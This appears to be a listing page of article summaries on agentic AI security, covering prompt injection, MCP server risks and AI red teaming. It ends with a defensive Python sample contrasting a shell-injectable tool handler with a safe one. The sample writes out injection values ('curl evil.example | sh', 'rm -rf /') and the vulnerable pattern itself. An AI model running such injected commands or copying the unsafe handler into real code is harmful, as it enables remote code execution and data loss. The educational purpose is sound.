Agentic AI and Security
Explores the unique security risks of Agentic AI systems, focusing on the 'Lethal Trifecta' of vulnerabilities and proposed mitigation strategies.
Explores the A2AS framework and Agentgateway as a security approach to mitigate prompt injection attacks in AI/LLM systems by embedding behavioral contracts and cryptographic verification.
A framework for evaluating security threats and risks in Model Context Protocol (MCP) implementations, based on recent incidents.
Explores the emerging security research landscape around the Model Context Protocol (MCP), a new standard for connecting AI models to external tools and data.
A developer's cautionary tale about command injection vulnerabilities in AI coding assistants using MCP servers, highlighting real-world security risks.
Analyzes the security risks of Model Context Protocol (MCP) servers, framing them as prompts that instruct AIs to execute third-party code.
A recap of organizing and speaking at Global Azure Quebec 2025, focusing on AI red teaming and securing generative AI workloads.
Argues that AI security levels are determined by market forces and user behavior, not by individual efforts, and will reach a functional equilibrium.
A penetration tester demonstrates AI security risks by having an AI generate stealthy malicious code for a proof-of-concept backdoor.
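Several of the MCP entries above turn on the same underlying flaw: a tool handler that interpolates model- or user-controlled input into a shell command. A minimal sketch of the vulnerable and safer patterns, with hypothetical handler names not drawn from any specific server:

```python
import shlex
import subprocess

# Hypothetical MCP-style tool handlers; names are illustrative only.
def run_git_log_unsafe(repo_path: str) -> str:
    """Vulnerable: attacker-controlled repo_path is parsed by the shell.

    repo_path = "repo; curl evil.example | sh" would run the injected command.
    """
    return subprocess.run(
        f"git -C {repo_path} log --oneline -n 5",
        shell=True, capture_output=True, text=True,
    ).stdout

def run_git_log_safe(repo_path: str) -> str:
    """Safer: arguments passed as a list, so the input is never shell-parsed."""
    return subprocess.run(
        ["git", "-C", repo_path, "log", "--oneline", "-n", "5"],
        capture_output=True, text=True,
    ).stdout

# When a shell string is unavoidable, shlex.quote neutralizes metacharacters.
print(shlex.quote("repo; rm -rf /"))  # prints 'repo; rm -rf /' (single-quoted)
```

The list-argument form is the standard fix: the child process receives `repo_path` as a single argument, so shell metacharacters in it have no effect.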